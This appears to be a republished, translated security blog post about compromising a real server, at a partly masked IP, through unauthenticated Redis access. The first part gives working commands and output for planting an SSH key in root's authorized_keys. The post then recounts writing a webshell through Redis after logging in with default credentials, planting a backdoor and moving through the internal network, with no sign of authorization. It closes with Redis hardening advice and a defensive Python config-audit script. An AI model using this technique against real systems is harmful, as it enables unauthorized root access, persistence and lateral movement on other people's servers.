2025-02-27 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
Redis has been a hot topic lately, which leads to the following story.
Target IP: 210.73.90.xxx
Vulnerability: unauthorized Redis access
Exploit 1:
1) Generate a key pair locally
root@GanDolf:~# ssh-keygen -t rsa
2) Write the public key to a file
root@GanDolf:~# cd /root/.ssh/
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
3) Connect to Redis and write the file
root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OK
root@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379 > config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379 > CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379 > config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379 > SAVE
OK
(1.40s)
210.73.90.xxx:6379 > SAVE
OK
210.73.90.xxx:6379 > exit
root@GanDolf:~/.ssh# ssh
4) Connect to the server
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
Port 22 turned out not to be open.
At this point this method has failed.
Exploit 2:
Nmap scan results:
80, 443 open
Browsing to port 80 showed CactiEZ v10.
Logging in with the weak credentials admin/admin succeeded, but no upload path was found.
Next, try writing a webshell through Redis.
Prerequisite: the physical path of the website.
Several manual attempts to get the site to disclose its path failed.
So I turned to digging up installation information for CactiEZ v10.
I downloaded CactiEZ v10, installed it in a virtual machine of my own, and started it to find the physical path:
/var/www/html
So Redis was used to write the shell.
Then the "kitchen knife" webshell client connected:
Finally, drop a small backdoor to see what can be dug up, then connect back to the local machine and roam the internal network (many switches and hosts ^_^).
Finally, the security recommendations for Redis, summarized:
1) Change the default port
2) Listen only on the local interface
3) Start Redis as a non-root user; otherwise Exploit 1 above applies and gives root privileges directly
4) Edit the configuration file to disable or rename the related commands
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
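The four recommendations above can be checked mechanically. The following is an added example, not code from the original article: a small audit of redis.conf text. The function names, the sample configurations and the run_as_uid parameter (the uid of the redis-server process, supplied by the caller) are assumptions made for illustration.

```python
import shlex

def parse_conf(text):
    """Parse redis.conf text into (directives, renamed_commands)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # commented-out lines have no effect
            continue
        key, *args = shlex.split(line)
        if key.lower() == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]  # "" means the command is disabled
        else:
            directives[key.lower()] = args
    return directives, renamed

def audit(conf_text, run_as_uid, sensitive=("CONFIG",)):
    """Return one finding per recommendation (1-4 above) that is not met."""
    d, renamed = parse_conf(conf_text)
    findings = []
    if d.get("port", ["6379"])[0] == "6379":
        findings.append("port: default 6379 in use")
    # A leading '-' (Redis 6.2+) only means "ignore if the address is unavailable".
    # A missing bind directive is treated here as listening on all interfaces.
    binds = [a.lstrip("-") for a in d.get("bind", [])]
    if not binds or any(a not in ("127.0.0.1", "::1") for a in binds):
        findings.append("bind: not restricted to loopback")
    if run_as_uid == 0:
        findings.append("user: redis-server runs as root")
    for cmd in sensitive:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still callable by its own name")
    return findings

# Constructed sample configs (not taken from the server in the article).
WEAK = """
port 6379
bind 0.0.0.0
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
"""
HARDENED = """
port 46379
bind 127.0.0.1 -::1
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for name, conf, uid in (("weak", WEAK, 0), ("hardened", HARDENED, 999)):
        print(name, audit(conf, uid) or "no findings")
```

Note that the commented-out rename-command line in the weak sample counts as a finding: the directive only takes effect once the leading # is removed.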